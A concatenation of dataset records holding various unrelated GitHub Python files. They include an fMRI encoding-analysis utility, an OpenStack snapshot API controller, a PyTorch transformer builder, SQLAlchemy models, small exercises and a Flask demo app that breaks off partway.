1\n\n\ndef calculate_Q():\n url = urllib.request.urlopen(\"http://lauzhack.sqpub.ch/teams\")\n data = json.loads(url.read().decode())\n return data[4][\"XBT\"], data[4][\"cash\"]\n\n\n","repo_name":"Bastian2008/LauzHack","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6923614620","text":"import torch\nimport joblib\nimport numpy as np\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom scipy.stats import pearsonr\nfrom utils.final_model import ResNet1HeadID\nfrom torchvision.models.feature_extraction import create_feature_extractor\nfrom utils.evaluation import MNNPC\nimport torchvision.transforms as T\nimport os\n\ndef load_images_from_folder(folder_path, start=None, end=None):\n image_paths = []\n for filename in os.listdir(folder_path)[start:end]:\n img_path = os.path.join(folder_path, filename)\n\n image_paths.append(img_path)\n return image_paths\n\n#slightly adjusted load_subject_data func\ndef load_subject_data(subject, index_start=None, index_end=None):\n current_proj_dir = os.getcwd().split('hpc')[0] + 'hpc'\n path = '/Users/emilykruger/Documents/GitHub/aml_project_2023/data/training_split/subj0' + str(subject)\n data_lh = np.load(path + '/training_fmri/lh_train_fmri.npy')[index_start : index_end]\n data_rh = np.load(path + '/training_fmri/rh_train_fmri.npy')[index_start : index_end]\n brain = np.concatenate((data_lh, data_rh), axis = 1)\n print('Shape of pca_brain: ', brain.shape)\n folder_path = path+\"/training_images/\"\n image_paths = load_images_from_folder(folder_path, index_start, index_end)\n \n return brain, image_paths\n\n#For ResNet \ndef get_block_names(model):\n layer_names = []\n for layer_name, _ in model.named_children():\n layer_names.append(layer_name)\n return layer_names\n\n#For Aleknet\ndef get_module_names(model):\n layer_names = []\n for layer_name, _ in model.named_modules():\n layer_names.append(layer_name)\n return layer_names\n\ndef flatten_features(outputs):\n for key, item in outputs.items():\n outputs[key] = item.flatten()\n return outputs\n\ndef make_prediction(model, flattened_dict, in_feat_model):\n preds = {}\n for key, item in flattened_dict.items():\n adj_layer = torch.nn.Linear(len(item), in_feat_model)\n adj_layer.requires_grad = False\n adj_output = adj_layer(item)\n pred = model.head(adj_output)\n preds[key] = pred\n return preds\n\n# def make_prediction(model, flattened_dict, in_feat_model, subject):\n# preds = {}\n# for key, item in flattened_dict.items():\n# adj_layer = torch.nn.Linear(len(item), in_feat_model)\n# print('3. in_size of adj_layer', len(item))\n# print('4. out_size of adj_layer', in_feat_model)\n# print('5. in_size of shared layer', model.shared.in_features)\n# adj_layer.requires_grad = False\n# adj_output = adj_layer(item)\n# shared = model.shared(adj_output)\n# if subject == 1:\n# subject = model.sub1(adj_output)\n# elif subject == 2:\n# subject = model.sub2(adj_output)\n# elif subject == 3:\n# subject = model.sub3(adj_output)\n# elif subject == 4:\n# subject = model.sub4(adj_output)\n# elif subject == 5:\n# subject = model.sub5(adj_output)\n# elif subject == 6:\n# subject = model.sub6(adj_output)\n# elif subject == 7:\n# subject = model.sub7(adj_output)\n# elif subject == 8:\n# subject = model.sub8(adj_output)\n\n# # Average the shared and subject-specific layers\n# combined = (shared + subject) / 2\n \n# pred = model.head(combined)\n# preds[key] = pred\n# return preds\n\ndef get_pca_model(subject):\n sub = str(subject)\n pca = joblib.load(f'/Users/emilykruger/Documents/GitHub/aml_project_2023/hpc/utils/pca_models/pca_model_subj01.joblib')\n return pca\n\ndef preprocess(img, size=224):\n transform = T.Compose([\n T.ToTensor(),\n T.Resize((size, size)),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n\n ])\n return transform(img)\n\ndef process_subject_data(data,subject, split=True):\n subject = f'subj0{subject}'\n # Define the split dictionary\n split_dict = {\"subj01\": 19004, \"subj02\": 19004, \"subj03\": 19004, \"subj04\": 19004,\n \"subj05\": 19004, \"subj06\": 18978, \"subj07\": 19004, \"subj08\": 18981}\n\n\n if subject not in split_dict.keys():\n print(\"Invalid subject\")\n return None, None\n\n # Split data based on the split dictionary\n if split:\n lh_data = data[:split_dict[subject]]\n rh_data = data[split_dict[subject]:]\n else:\n lh_data = data\n rh_data = None\n\n # Read ROI directories\n roi_dir_lh = np.load(f'/Users/emilykruger/Documents/GitHub/aml_project_2023/data/training_split/{subject}/roi_masks/lh.all-vertices_fsaverage_space.npy')\n if rh_data is not None:\n roi_dir_rh = np.load(f'/Users/emilykruger/Documents/GitHub/aml_project_2023/data/training_split/{subject}/roi_masks/rh.all-vertices_fsaverage_space.npy')\n else:\n roi_dir_rh = None\n\n # Create responses\n fsaverage_response_lh = np.zeros(len(roi_dir_lh))\n fsaverage_response_lh[np.where(roi_dir_lh)[0]] = lh_data\n\n if rh_data is not None:\n fsaverage_response_rh = np.zeros(len(roi_dir_rh))\n fsaverage_response_rh[np.where(roi_dir_rh)[0]] = rh_data\n else:\n fsaverage_response_rh = None\n\n return fsaverage_response_lh, fsaverage_response_rh\n\ndef corr_roi_plot(model, lh, rh, dataset, subject, split = True):\n subject = f'subj0{subject}'\n working_dir = rf'C:\\Users\\rvacher\\Downloads\\algonauts_2023_tutorial_data\\{subject}' #Change as needed\n transform = T.Compose([\n T.ToTensor(), T.Resize((224, 224)),\n T.Normalize(mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225])])\n\n #logic for setting up the val dataset and remember to transform the dataset with the transform initialized above\n dataset = dataset #this is hopefully a val or test dataset or else you're banned >:(\n ## ADD\n ## CODE\n ## HERE\n dataloader = [] # make this into the dataloader\n\n full_brain_pred = model(dataloader)\n\n # Define the split dictionary\n split_dict = {\"subj01\": 19004, \"subj02\": 19004, \"subj03\": 19004, \"subj04\": 19004,\n \"subj05\": 19004, \"subj06\": 18978, \"subj07\": 19004, \"subj08\": 18981}\n\n\n if subject not in split_dict.keys():\n print(\"Invalid subject\")\n return None, None\n\n # Split data based on the split dictionary\n if split:\n lh_data_pred = full_brain_pred[:split_dict[subject]]\n rh_data_pred = full_brain_pred[split_dict[subject]:]\n else:\n lh_data_pred = full_brain_pred\n rh_dataPred = None\n\n # Empty correlated array\n lh_correlation = np.zeros(lh.shape[1])\n rh_correlation = np.zeros(rh.shape[1])\n\n # Correlate each predicted LH vertex with the corresponding ground truth vertex\n for v in tqdm(range(lh.shape[1])):\n lh_correlation[v] = pearsonr(lh_data_pred[:,v], lh[:,v])[0]\n\n # Correlate each predicted RH vertex with the corresponding ground truth vertex\n for v in tqdm(range(r.shape[1])):\n rh_correlation[v] = pearsonr(rh_data_pred[:,v], rh[:,v])[0]\n\n # Load the ROI classes mapping dictionaries\n roi_mapping_files = ['mapping_prf-visualrois.npy', 'mapping_floc-bodies.npy',\n 'mapping_floc-faces.npy', 'mapping_floc-places.npy',\n 'mapping_floc-words.npy', 'mapping_streams.npy']\n roi_name_maps = []\n for r in roi_mapping_files:\n roi_name_maps.append(np.load(os.path.join(working_dir, 'roi_masks', r),\n allow_pickle=True).item())\n\n # Load the ROI brain surface maps\n lh_challenge_roi_files = ['lh.prf-visualrois_challenge_space.npy',\n 'lh.floc-bodies_challenge_space.npy', 'lh.floc-faces_challenge_space.npy',\n 'lh.floc-places_challenge_space.npy', 'lh.floc-words_challenge_space.npy',\n 'lh.streams_challenge_space.npy']\n rh_challenge_roi_files = ['rh.prf-visualrois_challenge_space.npy',\n 'rh.floc-bodies_challenge_space.npy', 'rh.floc-faces_challenge_space.npy',\n 'rh.floc-places_challenge_space.npy', 'rh.floc-words_challenge_space.npy',\n 'rh.streams_challenge_space.npy']\n lh_challenge_rois = []\n rh_challenge_rois = []\n for r in range(len(lh_challenge_roi_files)):\n lh_challenge_rois.append(np.load(os.path.join(working_dir, 'roi_masks',\n lh_challenge_roi_files[r])))\n rh_challenge_rois.append(np.load(os.path.join(working_dir, 'roi_masks',\n rh_challenge_roi_files[r])))\n\n # Select the correlation results vertices of each ROI\n roi_names = []\n lh_roi_correlation = []\n rh_roi_correlation = []\n for r1 in range(len(lh_challenge_rois)):\n for r2 in roi_name_maps[r1].items():\n if r2[0] != 0: # zeros indicate to vertices falling outside the ROI of interest\n roi_names.append(r2[1])\n lh_roi_idx = np.where(lh_challenge_rois[r1] == r2[0])[0]\n rh_roi_idx = np.where(rh_challenge_rois[r1] == r2[0])[0]\n lh_roi_correlation.append(lh_correlation[lh_roi_idx])\n rh_roi_correlation.append(rh_correlation[rh_roi_idx])\n roi_names.append('All vertices')\n lh_roi_correlation.append(lh_correlation)\n rh_roi_correlation.append(rh_correlation)\n\n # Create the plot\n lh_mean_roi_correlation = [np.mean(lh_roi_correlation[r])\n for r in range(len(lh_roi_correlation))]\n rh_mean_roi_correlation = [np.mean(rh_roi_correlation[r])\n for r in range(len(rh_roi_correlation))]\n plt.figure(figsize=(18,6))\n x = np.arange(len(roi_names))\n width = 0.30\n plt.bar(x - width/2, lh_mean_roi_correlation, width, label='Left Hemisphere')\n plt.bar(x + width/2, rh_mean_roi_correlation, width,\n label='Right Hemishpere')\n plt.xlim(left=min(x)-.5, right=max(x)+.5)\n plt.ylim(bottom=0, top=1)\n plt.xlabel('ROIs')\n plt.xticks(ticks=x, labels=roi_names, rotation=60)\n plt.ylabel('Mean Pearson\\'s $r$')\n plt.title(f'Encoding Accuracy of Individual ROIs for {subject}')\n plt.legend(frameon=True, loc=1)\n plt.show()\n ","repo_name":"RaghavVacher/aml_project_2023","sub_path":"hpc/utils/model_analysis.py","file_name":"model_analysis.py","file_ext":"py","file_size_in_byte":10011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19161008286","text":"\nf = open(\"input.txt\", \"rt\")\ndata=f.read()\nf.close()\nprint(data)\n\nfor line in data: #prints individual letters line by line\n print(line)\n \nf = open(\"input.txt\",\"rt\")\nfor a in f:\n print(a)\nf.close()\n\nf = open(\"output.txt\",\"wt\")\nf.write(data)\nf.close()\n\nf = open(\"output.txt\",\"wt\")\nprint(data,file = f)\nf.close()\n","repo_name":"KUP9752/PekgozKU-Yr12-Computer-Science","sub_path":"Work/PYTHON CODE/file IO/file IO.py","file_name":"file IO.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37626766217","text":"import reflex as rx\nfrom portfolio_web.styles.colors import colors as c\ncolor_principal = 'spectra'\n\n\ndef footer():\n r = rx.link(rx.center(rx.heading('Descargar CV',\n size='lg',\n transition='font-size 0.3s',\n _hover={'font-size': '2.2em'}),\n ),\n href='/CV_IT_1.pdf',\n width='100%',\n # height='100%',\n opacity='0.5',\n bg=c[color_principal]['900'],\n is_external=True,\n transition='opacity 0.3s',\n _hover={'opacity': 1,\n 'background-color': c[color_principal]['200']\n }\n )\n\n return r\n\n\ndef tags_grid(tags):\n tag_components = []\n for tag in tags:\n tag_components.append(\n rx.tag(tag,\n bg=c[color_principal]['800'],\n color=c[color_principal]['200']),\n )\n topics = rx.flex(\n *tag_components,\n margin_top='1rem',\n wrap='wrap',\n gap='2',\n )\n return topics\n\n\ndef card_footer(hard,soft):\n return rx.vstack(\n rx.text('Hard Skills Utilizados',\n as_='b'),\n tags_grid(hard),\n rx.text('Soft Skills Utilizados',\n as_='b'),\n tags_grid(soft),\n align_items='left',\n margin=0,\n padding=0\n )","repo_name":"juampa95/portfolio-web","sub_path":"portfolio_web/views/experience/footer.py","file_name":"footer.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31861606714","text":"\nimport pandas as pd\nfrom datetime import datetime\n\ndf = pd.read_csv(\"sphist.csv\")\ndf[\"Date\"] = pd.to_datetime(df[\"Date\"])\ndf = df[df[\"Date\"] > datetime(year=2015,month=4,day=1)]\ndf.sort(\"Date\",inplace = True,ascending=False)\nstarting_row = df[\"Date\"] == '1951-01-03'\nfor row in df[starting_row:]:\n print(row)\n break\n \n \n \n ","repo_name":"Nfinger/Nfinger.github.io","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9392025873","text":"from webob import exc\n\nfrom nova import log as logging\nfrom nova.api.openstack import wsgi\nfrom nova.notifier import api as notifier\nfrom nova import utils\nfrom nova import flags\n\nfrom reddwarf import exception\nfrom reddwarf.api import common\nfrom reddwarf.api import deserializer\nfrom reddwarf.api.views import snapshots\nfrom reddwarf.guest import api as guest_api\nfrom reddwarf.db import api as dbapi\nfrom reddwarf.db import snapshot_state\nfrom reddwarf.client import credential\nfrom swiftapi import swift\nimport urlparse\n\nLOG = logging.getLogger('reddwarf.api.snapshots')\nLOG.setLevel(logging.DEBUG)\n\nFLAGS = flags.FLAGS\n\ndef publisher_id(host=None):\n return notifier.publisher_id(\"reddwarf-api\", host)\n\nclass Controller(object):\n def __init__(self):\n self.guestapi = guest_api.API()\n self.view = snapshots.ViewBuilder()\n super(Controller, self).__init__()\n\n def show(self, req, id):\n \"\"\" Returns a requested snapshot \"\"\"\n LOG.info(\"Get snapshot %s\" % id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n db_snapshot = dbapi.db_snapshot_get(id)\n if not db_snapshot:\n return exc.HTTPNotFound()\n\n snapshot = self.view.build_single(db_snapshot, req)\n return { 'snapshot' : snapshot }\n\n def index(self, req):\n \"\"\" Returns a list of Snapshots for the Instance \"\"\"\n LOG.info(\"List snapshots\")\n LOG.debug(\"%s - %s\", req.environ, req.body)\n context = req.environ['nova.context']\n user_id = context.user_id\n\n instance_id = ''\n if req.query_string is not '':\n # returns list of tuples\n name_value_pairs = urlparse.parse_qsl(req.query_string,\n keep_blank_values=True,\n strict_parsing=False)\n for name_value in name_value_pairs:\n if name_value[0] == 'instanceId':\n instance_id = name_value[1]\n break\n\n if instance_id and len(instance_id) > 0:\n LOG.debug(\"Listing snapshots by instance_id %s\", instance_id)\n snapshot_list = dbapi.db_snapshot_list_by_user_and_instance(context, user_id, instance_id)\n else:\n LOG.debug(\"Listing snapshots by user_id %s\", user_id)\n snapshot_list = dbapi.db_snapshot_list_by_user(context, user_id)\n\n snapshots = [self.view.build_index(db_snapshot, req)\n for db_snapshot in snapshot_list]\n\n return dict(snapshots=snapshots)\n\n def delete(self, req, id):\n \"\"\" Deletes a Snapshot \"\"\"\n LOG.info(\"Delete snapshot with id %s\", id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n context = req.environ['nova.context']\n db_snapshot = dbapi.db_snapshot_get(id)\n\n if not db_snapshot:\n return exc.HTTPNotFound()\n\n uri = db_snapshot.storage_uri\n\n #Only delete from swift if we have a URI\n if uri and len(uri) > 0:\n container, file = uri.split('/',2)\n\n LOG.debug(\"Deleting from Container: %s - File: %s\", container, file)\n\n ## TODO Move these to database!\n ST_AUTH=FLAGS.swiftclient_auth_url\n ST_USER=FLAGS.swiftclient_user\n ST_KEY=FLAGS.swiftclient_key\n\n opts = {'auth' : ST_AUTH,\n 'user' : ST_USER,\n 'key' : ST_KEY,\n 'snet' : False,\n 'prefix' : '',\n 'auth_version' : '1.0'}\n try:\n swift.st_delete(opts, container, file)\n except Exception as e:\n exc.HTTPInternalServerError(e)\n\n # Mark snapshot deleted in DB\n dbapi.db_snapshot_delete(context, id)\n\n return exc.HTTPNoContent()\n\n def create(self, req, body):\n \"\"\" Creates a Snapshot \"\"\"\n self._validate(body)\n instance_id = body['snapshot']['instanceId']\n name = body['snapshot']['name']\n LOG.info(\"Create Snapshot for instance %s\", instance_id)\n LOG.debug(\"%s - %s\", req.environ, req.body)\n\n context = req.environ['nova.context']\n\n # Generate UUID for Snapshot\n uuid = str(utils.gen_uuid())\n\n values = {\n 'uuid' : uuid,\n 'instance_uuid' : instance_id,\n 'name' : name,\n 'state' : snapshot_state.SnapshotState.INPROGRESS,\n 'user_id' : context.user_id,\n 'project_id' : context.project_id\n }\n\n ## TODO Move these to database!\n ST_AUTH=FLAGS.swiftclient_auth_url\n ST_USER=FLAGS.swiftclient_user\n ST_KEY=FLAGS.swiftclient_key\n\n # Add record to database\n db_snapshot = dbapi.db_snapshot_create(context, values)\n cred = credential.SwiftCredential(ST_USER, ST_KEY, ST_AUTH)\n self.guestapi.create_snapshot(context, instance_id, uuid, cred)\n snapshot = self.view.build_single(db_snapshot, req)\n return { 'snapshot' : snapshot }\n\n def _validate(self, body):\n \"\"\"Validate that the request has all the required parameters\"\"\"\n if not body:\n raise exception.BadRequest(\"The request contains an empty body\")\n try:\n body['snapshot']\n body['snapshot']['instanceId']\n body['snapshot']['name']\n except KeyError as e:\n LOG.error(\"Create Snapshot Required field(s) - %s\" % e)\n raise exception.BadRequest(\"Required element/key - %s was not specified\" % e)\n\ndef create_resource(version='1.0'):\n controller = {\n '1.0': Controller,\n }[version]()\n\n metadata = {\n \"attributes\": {\n \"snapshot\": [\"id\", \"state\", \"availabilityZone\", \"createdTime\", \"instanceId\",\n \"engine\", \"engineVersion\"],\n \"link\": [\"rel\", \"href\"],\n },\n }\n\n xmlns = {\n '1.0': common.XML_NS_V10,\n }[version]\n\n serializers = {\n 'application/xml': wsgi.XMLDictSerializer(metadata=metadata, xmlns=xmlns),\n }\n\n deserializers = {\n 'application/xml': deserializer.InstanceXMLDeserializer(),\n }\n\n response_serializer = wsgi.ResponseSerializer(body_serializers=serializers)\n request_deserializer = wsgi.RequestDeserializer(deserializers)\n return wsgi.Resource(controller, deserializer=request_deserializer, serializer=response_serializer)\n","repo_name":"CaptTofu/reddwarf","sub_path":"reddwarf/api/snapshots.py","file_name":"snapshots.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"21007093486","text":"def getSearchResult(searchItem, listOfItems):\n finalList = []\n\n for item in listOfItems:\n finalList.append(computeObject(searchItem,item))\n\n finalList = sorted(finalList, lambda x: (x[\"num\"],x[\"original\"]))\n listToReturn = []\n for i in finalList:\n listToReturn.append(finalList[\"stringVal\"])\n return listToReturn\n\ndef computeObject(searchItem,item):\n itemCopy = item\n return {\n \"num\": 1,\n \"original\": item,\n \"stringVal\": \"-Sams+ung\"\n }","repo_name":"sidb28/TeamPeanuts-CodeIt2020","sub_path":"i.py","file_name":"i.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11890253164","text":"from trasnformer import Transformer\nfrom multihead_attention import MultiHeadAttention\nfrom input_embedding import InputEmbeddings\nfrom positional_encoding import PositionalEncoding\nfrom feedforward import FeedForward\nfrom encoder_block import EncoderBlock, Encoder\nfrom decoder_block import DecoderBlock, Decoder\nfrom projection import Projection\n\nimport torch \nimport torch.nn as nn\n\ndef build_transformer(src_vocab_size, target_vocab_size, src_seq_len, target_seq_len, d_model =512, N = 6, h=8, dropout=0.1, d_ff=2048) -> Transformer:\n # embeddings \n src_embeddings = InputEmbeddings(d_model, src_vocab_size)\n target_embeddings = InputEmbeddings(d_model, target_vocab_size)\n \n # positional encoding layers\n src_pos_emb = PositionalEncoding(d_model, src_seq_len, dropout)\n target_pos_emb = PositionalEncoding(d_model, target_seq_len, dropout)\n \n # encoder blocks\n encoder_blocks = []\n for _ in range(N):\n enc_attention_block = MultiHeadAttention(d_model, h, dropout)\n ff_block = FeedForward(d_model, d_ff, dropout)\n encoder_block = EncoderBlock(d_model, enc_attention_block, ff_block, dropout)\n encoder_blocks.append(encoder_block)\n \n # decoder blocks\n decoder_blocks = []\n for _ in range(N):\n decoder_attnetion_block = MultiHeadAttention(d_model, h, dropout)\n decoder_cross_attention_block = MultiHeadAttention(d_model, h, dropout)\n ff_block = FeedForward(d_model, d_ff, dropout)\n decoder_block = DecoderBlock(d_model, decoder_attnetion_block, decoder_cross_attention_block, ff_block, dropout)\n decoder_blocks.append(decoder_block)\n \n # create a complete encoder decoder \n encoder = Encoder(d_model, nn.ModuleList(encoder_blocks))\n decoder = Decoder(d_model, nn.ModuleList(decoder_blocks))\n \n # projection layer\n projection = Projection(d_model, target_vocab_size)\n \n # Transformer \n transformer = Transformer(encoder, decoder, src_embeddings, target_embeddings, src_pos_emb, target_pos_emb, projection)\n \n # parameter initialization\n for p in transformer.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n \n return transformer","repo_name":"pvsnp9/building-transformer-nmt","sub_path":"builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72248586387","text":"from .views import (\n RegistrationAPIView, EmailVerificationAPIView, LoginAPIView, FileUploadView\n) \nfrom django.urls import path\n\nurlpatterns = [\n path('user/', RegistrationAPIView.as_view()),\n path('user/verification/', EmailVerificationAPIView.as_view()),\n path('login/', LoginAPIView.as_view()),\n path('upload_images/', FileUploadView.as_view()),\n]\n","repo_name":"GautamAjani/aubergine_practical","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35462107152","text":"import datetime\nfrom sqlalchemy import Column, Integer, BigInteger, String, ForeignKey, Sequence, DateTime\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom settings import Base\n\n\nclass Application(Base):\n\t__tablename__ = 'applications'\n\n\tcommercial_state_rejected = 0\n\tcommercial_state_approved = 1\n\tcommercial_state_pending = 2\n\n\tid = Column(Integer, Sequence('application_id_seq'), primary_key=True)\n\tcompany_id = Column(ForeignKey('companies.id'))\n\tagree = Column(Integer)\n\tamount = Column(Integer)\n\tname = Column(String(50))\n\tnumber_payments = Column(Integer)\n\n\tpayments = relationship(\"Payment\", back_populates=\"application\")\n\tcompany = relationship(\"Company\", back_populates=\"applications\")\n\n\t@hybrid_property\n\tdef is_approved(self):\n\t\treturn self.commercial_state == self.commercial_state_approved\n\n\t@hybrid_property\n\tdef agree_state(self):\n\t\tif self.is_approved:\n\t\t\tif self.agree == 1:\n\t\t\t\treturn 'Si'\n\t\t\telif self.agree == 0:\n\t\t\t\treturn 'No'\n\n\t\t\treturn 'Pendiente'\n\n\t\treturn '-'\n\n\t@hybrid_property\n\tdef commercial_state(self):\n\t\tif(self.amount < 1000000):\n\t\t\treturn self.commercial_state_pending\n\t\telif(self.amount <= 10000000):\n\t\t\treturn self.commercial_state_approved\n\t\t\n\t\treturn self.commercial_state_rejected\n\n\t@hybrid_property\n\tdef commercial_state_text(self):\n\t\tif(self.commercial_state == self.commercial_state_pending):\n\t\t\treturn \"Pendiente\"\n\t\telif(self.commercial_state == self.commercial_state_approved):\n\t\t\treturn \"Aprobado\"\n\n\t\treturn \"Rechazado\"\n\n\t@hybrid_property\n\tdef count_payments(self):\n\t\treturn len(self.payments)\n\nclass City(Base):\n\t__tablename__ = 'cities'\n\n\tid = Column(Integer, Sequence('city_id_seq'), primary_key=True)\n\tcontry_id = Column(ForeignKey('contries.id'))\n\tname = Column(String(50))\n\n\tcountry = relationship(\"Country\", back_populates=\"cities\")\n\tcompanies = relationship(\"Company\", back_populates=\"city\")\n\tusers = relationship(\"User\", back_populates=\"city\")\n\n\nclass Company(Base):\n\t__tablename__ = 'companies'\n\n\tid = Column(Integer, Sequence('company_id_seq'), primary_key=True)\n\tcity_id = Column(ForeignKey('cities.id'))\n\tuser_id = Column(ForeignKey('users.id'))\n\taddress = Column(String(50))\n\tname = Column(String(50))\n\ttel = Column(String(50))\n\n\tapplications = relationship(\"Application\", back_populates=\"company\")\n\tcity = relationship(\"City\", back_populates=\"companies\")\n\tuser = relationship(\"User\", back_populates=\"company\", uselist=False)\n\n\nclass Country(Base):\n\t__tablename__ = 'contries'\n\n\tid = Column(Integer, Sequence('country_id_seq'), primary_key=True)\n\tname = Column(String(50))\n\n\tcities = relationship(\"City\", back_populates=\"country\")\n\t\n\nclass Payment(Base):\n __tablename__ = 'payments'\n\n id = Column(Integer, Sequence('payment_id_seq'), primary_key=True)\n application_id = Column(ForeignKey('applications.id'))\n value = Column(Integer)\n created_at = Column(DateTime, default=datetime.datetime.utcnow)\n\n application = relationship(\"Application\", back_populates=\"payments\")\t\t\n\t\n\nclass User(Base):\n\t__tablename__ = 'users'\n\n\tid = Column(Integer, Sequence('user_id_seq'), primary_key=True)\n\tcity_id = Column(ForeignKey('cities.id'))\n\tdoc = Column(BigInteger)\n\temail = Column(String(50))\n\tname = Column(String(50))\n\tpassword = Column(String(255))\n\ttel = Column(String(50))\n\n\tcity = relationship(\"City\", back_populates=\"users\")\n\tcompany = relationship(\"Company\", back_populates=\"user\", uselist=False)\n\n\n","repo_name":"andrestntx/teprestamos.com","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"464701355","text":"# add_binary.py\n\n\ndef addBinary(a: str, b: str) -> str:\n a = list(a)\n b = list(b)\n c = \"\"\n carry = 0\n while a or b or carry:\n if a:\n carry += int(a.pop())\n if b:\n carry += int(b.pop())\n c += str(carry % 2)\n carry //= 2\n\n return c[::-1]\n\nif __name__ == \"__main__\":\n print(\"=====Example 1=====\")\n a = \"11\"\n b = \"1\"\n expected = \"100\"\n result = addBinary(a, b)\n print(f\"Expected:\\n\\t{expected}\")\n print(f\"Result:\\n\\t{result}\")\n\n print(\"=====Example 2=====\")\n a = \"1010\"\n b = \"1011\"\n expected = \"10101\"\n result = addBinary(a, b)\n print(f\"Expected:\\n\\t{expected}\")\n print(f\"Result:\\n\\t{result}\")\n\n print(\"=====Example 3=====\")\n a = \"0\"\n b = \"0\"\n expected = \"0\"\n result = addBinary(a, b)\n print(f\"Expected:\\n\\t{expected}\")\n print(f\"Result:\\n\\t{result}\")\n","repo_name":"giwankim/algo","sub_path":"leetcode/67-add-binary/add_binary.py","file_name":"add_binary.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12459658835","text":"import socket\nimport time\nimport twitter\nimport redis\nimport os\nfrom dotenv import load_dotenv\n\n\nmi_socket = socket.socket()\nmi_socket.bind(('localhost', 9000))\nmi_socket.listen(5)\n\ndef getTweetsWords(q, until_date, count=1):\n load_dotenv()\n api = twitter.Api(consumer_key=os.environ.get(\"CONSUMER_KEY\"),\n consumer_secret=os.environ.get(\"CONSUMER_SECRET\"),\n access_token_key=os.environ.get(\"ACCESS_TOKEN_KEY\"),\n access_token_secret=os.environ.get(\"ACCESS_TOKKEN_SECRET\"))\n\n tweets = api.GetSearch(\n raw_query=f'q={q}%20&result_type=recent&until={until_date}&lang=es&count={count}')\n\n return tweets[0].text # Esto es un tweet\n\nwhile True:\n conexion, addr = mi_socket.accept()\n print(\"Conexión establecida\")\n print(addr)\n current_data = getTweetsWords(\"covid\", \"2020-06-30\", \"1\")\n print(current_data)\n conexion.send(bytes(current_data.encode(encoding='UTF-8')))\n\n conexion.close()\n","repo_name":"alvaroenrique/bigdata-twitter-stream","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19743024819","text":"from flask import Flask, request, render_template\nimport random \napp = Flask(__name__)\n\n@app.route('/')\ndef display_homepage():\n return render_template('homepage.html')\n\n@app.route('/froyo')\ndef choose_froyo():\n return render_template('froyo-form.html')\n\n@app.route('/results', methods=['GET'])\ndef froyo_results():\n context = {\n 'name': request.args.get('full_name'),\n 'users_email': request.args.get('email'),\n 'users_phone': request.args.get('phone'),\n 'flavor': request.args.get('flavor'),\n 'pizza_size': request.args.get('size'),\n 'toppings': request.args.get('toppings')\n }\n return render_template('froyo-results.html', **context)\n\n\n@app.route('/favorites')\ndef choose_favorites():\n return render_template('fav-form.html')\n\n@app.route('/favorite_results', methods=['GET'])\ndef favorite_results():\n context = {\n 'color': request.args.get('color'),\n 'animal': request.args.get('animal'),\n 'city': request.args.get('city')\n }\n return render_template('fav-results.html', **context)\n\n\n@app.route('/secret_message')\ndef secret_message():\n return render_template('sec-mess-form.html')\n\n@app.route('/message_results', methods=['POST'])\ndef display_secret_message():\n secret_message = request.form.get('secret_message')\n def sortString(str):\n return ''.join(sorted(str))\n secret_message= sortString(secret_message)\n\n context = {\n 'secret_message': secret_message\n }\n return render_template('sec-mess-results.html', **context)\n\n\n@app.route('/calculator')\ndef calculator_form():\n return render_template('calculator-form.html')\n\n\n@app.route('/calculator_results', methods=['GET'])\ndef calculator_results():\n operation = request.args.get('operation')\n first_number = request.args.get('first-number')\n second_number = request.args.get('second-number')\n\n if (operation == 'add'):\n result = int(first_number) + int(second_number)\n elif (operation == 'subtract'):\n result = int(first_number) - int(second_number)\n elif (operation == 'multiply'):\n result = int(first_number) * int(second_number)\n elif (operation == 'division'):\n result = int(first_number) / int(second_number)\n\n context = {\n 'operation': operation,\n 'first_number': first_number,\n 'second_number': second_number,\n 'result': result\n }\n return render_template('calculator-results.html', **context)\n\n\n\n@app.route('/horoscope')\ndef horoscope():\n return render_template('horoscope_form.html')\n\n\n@app.route('/horoscope_results', methods=['GET'])\ndef display_horoscope():\n month = request.args.get('month')\n day = request.args.get('day')\n if (month == 'jan'):\n sign = 'Aquarius'\n horoscope = \"Will you go out with me? Be careful if a person says yes when you ask that question today, Aquarius. You could take the nature of this situation to the extreme. Saying yes doesn't mean you're suddenly in charge of his or her life. Nor are you responsible for anything that person does or how they feel. If you're still asking the question without getting any positive responses, don't worry. Keep trying.\"\n if (month == 'feb'):\n 